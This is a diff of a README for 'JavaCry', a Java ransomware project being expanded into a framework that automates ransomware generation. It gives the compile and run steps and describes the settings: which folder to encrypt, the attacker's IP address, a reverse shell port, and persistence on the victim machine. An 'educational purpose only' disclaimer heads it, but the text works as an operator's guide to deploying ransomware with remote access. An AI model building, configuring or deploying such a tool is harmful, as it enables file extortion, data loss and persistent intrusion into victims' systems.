acezxn/JavaCry/README.md

-# JavaCry
+# JavaCry Java Ransomware Framework
 **Warning: this project is for educational purpose only.
 Please make sure that the program encrypts the right directory.
 I do not take any responsibility of any damage.**

 ![image](https://github.com/acezxn/JavaCry/blob/main/images/YourFilesHaveBeenEncrypted.png)

 ### the project is still in development

 It is a project to build a ransomware made with java.
+With the framwork, ransomware generation is automated.

 ## User guideline
-* To compile JavaCry.java, move to Payload and run `javac JavaCry.java -d Classes --release 8` on terminal
-* To package JavaCry into a Jar file, move to Payload/Classes/ and run `jar -cvmf ../manifest.txt JavaCry.jar *.class ../img/` on terminal
+* To run the JRF framework, move to JRF/Classes directory and run `java JRF` in terminal

-* Set the remote host IP address of JavaCry and Decryptor.java appropriately to your server's IP address.
+### Parameters:
-* Make sure targetPath variable, which is in JavaCry.java, is **set to the right folder**.
+* Target path: the path which the ransomware encrypts the files.
+Make sure targetPath variable, which is in JavaCry.java, is **set to the right folder**.
+Leaving blank would mean that the ransomware would encrypt its local directory.
-* The base64 encoded payload embedded in JavaCry resembles Decryptor.java.
-Modify Decryptor.java as needed and encode the new Base64 encoded string to JavaCry.
+* Local IP: the attackers IP address
+* Reverse shell:
+    * port: any port except 5555 and 6666, since these are the ports used by KeyServer and DecryptRequestHandler
+    * persistence: Decryptor tries to configure the victim system so that the attacker's access would be persistent.
+This may be detected as some system has permission setting blocking this utility.

 ## Features: